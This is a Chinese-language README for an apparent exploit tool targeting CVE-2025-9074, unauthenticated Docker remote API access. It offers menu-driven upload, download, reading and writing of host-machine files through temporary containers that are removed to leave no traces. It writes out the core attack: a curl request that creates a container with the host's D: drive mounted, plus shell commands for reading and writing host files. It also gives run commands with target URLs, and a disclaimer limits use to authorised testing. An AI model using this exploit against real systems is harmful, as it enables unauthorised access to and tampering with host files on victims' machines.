一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。
一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。
✅ 全自动容器生命周期管理:自动创建临时容器,操作完成后自动清理,不留痕迹
✅ 智能路径处理:自动识别并转换 Windows 路径为 Docker 挂载格式
✅ 全自动化操作流程:无需手动输入复杂命令,菜单式交互,一键完成文件操作
✅ 跨平台兼容:完美支持 Windows 和 Linux 系统
容器操作
镜像管理
宿主机文件操作
CVE-2025-9074 是 Docker 远程 API 的一个安全漏洞,攻击者可以通过未授权访问 Docker API 来:
使用 requirements.txt 安装所有依赖:
pip install -r requirements.txt
或手动安装:
pip install requests docker websocket-client
直接运行脚本,使用默认 Docker API 地址:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
本工具自动处理 Windows Docker Desktop 的路径映射:
| Windows 路径 | Docker 挂载路径 |
|---|
支持的输入格式:
D:\ 或 D:/D:\temp 或 D:/temp"D:\file.txt"(带引号)'D:/file.txt'(带引号)⚠️ 重要提示:
通过 Docker API 创建容器并挂载宿主机磁盘:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
通过在容器中执行命令来读写宿主机文件:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
欢迎提交 Issue 和 Pull Request!
本项目仅供教育和安全研究使用。
本工具仅用于授权的安全测试和教育目的。使用者需自行承担使用本工具的所有责任和风险。作者不对任何滥用或未经授权使用本工具的行为负责。
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |